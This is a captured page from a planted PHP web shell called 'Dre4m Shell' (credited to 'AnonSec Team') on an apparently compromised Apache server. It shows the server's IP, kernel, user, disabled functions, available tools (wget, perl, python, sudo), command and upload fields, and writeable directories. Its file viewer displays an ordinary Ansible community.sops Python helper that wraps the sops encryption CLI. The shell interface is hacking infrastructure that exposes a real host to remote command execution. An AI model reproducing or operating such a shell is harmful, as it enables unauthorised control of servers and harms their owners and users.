Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 18.191.236.5
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /lib/python3/dist-packages/ansible_collections/community/sops/plugins/module_utils/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /lib/python3/dist-packages/ansible_collections/community/sops/plugins/module_utils//sops.py
# Copyright (c), Edoardo Tenani <e.tenani@arduino.cc>, 2018-2020
# Simplified BSD License (see LICENSES/BSD-2-Clause.txt or https://opensource.org/licenses/BSD-2-Clause)
# SPDX-License-Identifier: BSD-2-Clause

from __future__ import absolute_import, division, print_function
__metaclass__ = type


import os

from ansible.module_utils.common.text.converters import to_text, to_native

# Since this is used both by plugins and modules, we need subprocess in case the `module` parameter is not used
from subprocess import Popen, PIPE


# From https://github.com/mozilla/sops/blob/master/cmd/sops/codes/codes.go
# Should be manually updated
SOPS_ERROR_CODES = {
    1: "ErrorGeneric",
    2: "CouldNotReadInputFile",
    3: "CouldNotWriteOutputFile",
    4: "ErrorDumpingTree",
    5: "ErrorReadingConfig",
    6: "ErrorInvalidKMSEncryptionContextFormat",
    7: "ErrorInvalidSetFormat",
    8: "ErrorConflictingParameters",
    21: "ErrorEncryptingMac",
    23: "ErrorEncryptingTree",
    24: "ErrorDecryptingMac",
    25: "ErrorDecryptingTree",
    49: "CannotChangeKeysFromNonExistentFile",
    51: "MacMismatch",
    52: "MacNotFound",
    61: "ConfigFileNotFound",
    85: "KeyboardInterrupt",
    91: "InvalidTreePathFormat",
    100: "NoFileSpecified",
    128: "CouldNotRetrieveKey",
    111: "NoEncryptionKeyFound",
    200: "FileHasNotBeenModified",
    201: "NoEditorFound",
    202: "FailedToCompareVersions",
    203: "FileAlreadyEncrypted"
}


def _create_single_arg(argument_name):
    def f(value, arguments, env):
        arguments.extend([argument_name, to_native(value)])

    return f


def _create_comma_separated(argument_name):
    def f(value, arguments, env):
        arguments.extend([argument_name, ','.join([to_native(v) for v in value])])

    return f


def _create_repeated(argument_name):
    def f(value, arguments, env):
        for v in value:
            arguments.extend([argument_name, to_native(v)])

    return f


def _create_boolean(argument_name):
    def f(value, arguments, env):
        if value:
            arguments.append(argument_name)

    return f


def _create_env_variable(argument_name):
    def f(value, arguments, env):
        env[argument_name] = value

    return f


GENERAL_OPTIONS = {
    'age_key': _create_env_variable('SOPS_AGE_KEY'),
    'age_keyfile': _create_env_variable('SOPS_AGE_KEY_FILE'),
    'aws_profile': _create_single_arg('--aws-profile'),
    'aws_access_key_id': _create_env_variable('AWS_ACCESS_KEY_ID'),
    'aws_secret_access_key': _create_env_variable('AWS_SECRET_ACCESS_KEY'),
    'aws_session_token': _create_env_variable('AWS_SESSION_TOKEN'),
    'config_path': _create_single_arg('--config'),
    'enable_local_keyservice': _create_boolean('--enable-local-keyservice'),
    'keyservice': _create_repeated('--keyservice'),
}


ENCRYPT_OPTIONS = {
    'age': _create_comma_separated('--age'),
    'kms': _create_comma_separated('--kms'),
    'gcp_kms': _create_comma_separated('--gcp-kms'),
    'azure_kv': _create_comma_separated('--azure-kv'),
    'hc_vault_transit': _create_comma_separated('--hc-vault-transit'),
    'pgp': _create_comma_separated('--pgp'),
    'unencrypted_suffix': _create_single_arg('--unencrypted-suffix'),
    'encrypted_suffix': _create_single_arg('--encrypted-suffix'),
    'unencrypted_regex': _create_single_arg('--unencrypted-regex'),
    'encrypted_regex': _create_single_arg('--encrypted-regex'),
    'encryption_context': _create_comma_separated('--encryption-context'),
    'shamir_secret_sharing_threshold': _create_single_arg('--shamir-secret-sharing-threshold'),
}


class SopsError(Exception):
    ''' Extend Exception class with sops specific informations '''

    def __init__(self, filename, exit_code, message, decryption=True):
        if exit_code in SOPS_ERROR_CODES:
            exception_name = SOPS_ERROR_CODES[exit_code]
            message = "error with file %s: %s exited with code %d: %s" % (
                filename, exception_name, exit_code, to_native(message))
        else:
            message = "could not %s file %s; Unknown sops error code: %s; message: %s" % (
                'decrypt' if decryption else 'encrypt', filename, exit_code, to_native(message))
        super(SopsError, self).__init__(message)


class Sops():
    ''' Utility class to perform sops CLI actions '''

    @staticmethod
    def _add_options(command, env, get_option_value, options):
        if get_option_value is None:
            return
        for option, f in options.items():
            v = get_option_value(option)
            if v is not None:
                f(v, command, env)

    @staticmethod
    def get_sops_binary(get_option_value):
        cmd = get_option_value('sops_binary') if get_option_value else None
        if cmd is None:
            cmd = 'sops'
        return cmd

    @staticmethod
    def decrypt(encrypted_file, content=None,
                display=None, decode_output=True, rstrip=True, input_type=None, output_type=None, get_option_value=None, module=None):
        # Run sops directly, python module is deprecated
        command = [Sops.get_sops_binary(get_option_value)]
        env = os.environ.copy()
        Sops._add_options(command, env, get_option_value, GENERAL_OPTIONS)
        if input_type is not None:
            command.extend(["--input-type", input_type])
        if output_type is not None:
            command.extend(["--output-type", output_type])
        if content is not None:
            encrypted_file = '/dev/stdin'
        command.extend(["--decrypt", encrypted_file])

        if module:
            exit_code, output, err = module.run_command(command, environ_update=env, encoding=None, data=content, binary_data=True)
        else:
            process = Popen(command, stdin=None if content is None else PIPE, stdout=PIPE, stderr=PIPE, env=env)
            (output, err) = process.communicate(input=content)
            exit_code = process.returncode

        if decode_output:
            # output is binary, we want UTF-8 string
            output = to_text(output, errors='surrogate_or_strict')
            # the process output is the decrypted secret; be cautious

        # sops logs always to stderr, as stdout is used for
        # file content
        if err and display:
            display.vvvv(to_text(err, errors='surrogate_or_strict'))

        if exit_code != 0:
            raise SopsError(encrypted_file, exit_code, err, decryption=True)

        if rstrip:
            output = output.rstrip()

        return output

    @staticmethod
    def encrypt(data, display=None, cwd=None, input_type=None, output_type=None, get_option_value=None, module=None):
        # Run sops directly, python module is deprecated
        command = [Sops.get_sops_binary(get_option_value)]
        env = os.environ.copy()
        Sops._add_options(command, env, get_option_value, GENERAL_OPTIONS)
        Sops._add_options(command, env, get_option_value, ENCRYPT_OPTIONS)
        if input_type is not None:
            command.extend(["--input-type", input_type])
        if output_type is not None:
            command.extend(["--output-type", output_type])
        command.extend(["--encrypt", "/dev/stdin"])

        if module:
            exit_code, output, err = module.run_command(command, data=data, binary_data=True, cwd=cwd, environ_update=env, encoding=None)
        else:
            process = Popen(command, stdin=PIPE, stdout=PIPE, stderr=PIPE, cwd=cwd, env=env)
            (output, err) = process.communicate(input=data)
            exit_code = process.returncode

        # sops logs always to stderr, as stdout is used for
        # file content
        if err and display:
            display.vvvv(to_text(err, errors='surrogate_or_strict'))

        if exit_code != 0:
            raise SopsError('to stdout', exit_code, err, decryption=False)

        return output


def get_sops_argument_spec(add_encrypt_specific=False):
    argument_spec = {
        'sops_binary': {
            'type': 'path',
        },
        'age_key': {
            'type': 'str',
            'no_log': True,
        },
        'age_keyfile': {
            'type': 'path',
        },
        'aws_profile': {
            'type': 'str',
        },
        'aws_access_key_id': {
            'type': 'str',
        },
        'aws_secret_access_key': {
            'type': 'str',
            'no_log': True,
        },
        'aws_session_token': {
            'type': 'str',
            'no_log': True,
        },
        'config_path': {
            'type': 'path',
        },
        'enable_local_keyservice': {
            'type': 'bool',
            'default': False,
        },
        'keyservice': {
            'type': 'list',
            'elements': 'str',
        },
    }
    if add_encrypt_specific:
        argument_spec.update({
            'age': {
                'type': 'list',
                'elements': 'str',
            },
            'kms': {
                'type': 'list',
                'elements': 'str',
            },
            'gcp_kms': {
                'type': 'list',
                'elements': 'str',
            },
            'azure_kv': {
                'type': 'list',
                'elements': 'str',
            },
            'hc_vault_transit': {
                'type': 'list',
                'elements': 'str',
            },
            'pgp': {
                'type': 'list',
                'elements': 'str',
            },
            'unencrypted_suffix': {
                'type': 'str',
            },
            'encrypted_suffix': {
                'type': 'str',
            },
            'unencrypted_regex': {
                'type': 'str',
            },
            'encrypted_regex': {
                'type': 'str',
            },
            'encryption_context': {
                'type': 'list',
                'elements': 'str',
            },
            'shamir_secret_sharing_threshold': {
                'type': 'int',
                'no_log': False,
            },
        })
    return argument_spec

Anon7 - 2022
AnonSec Team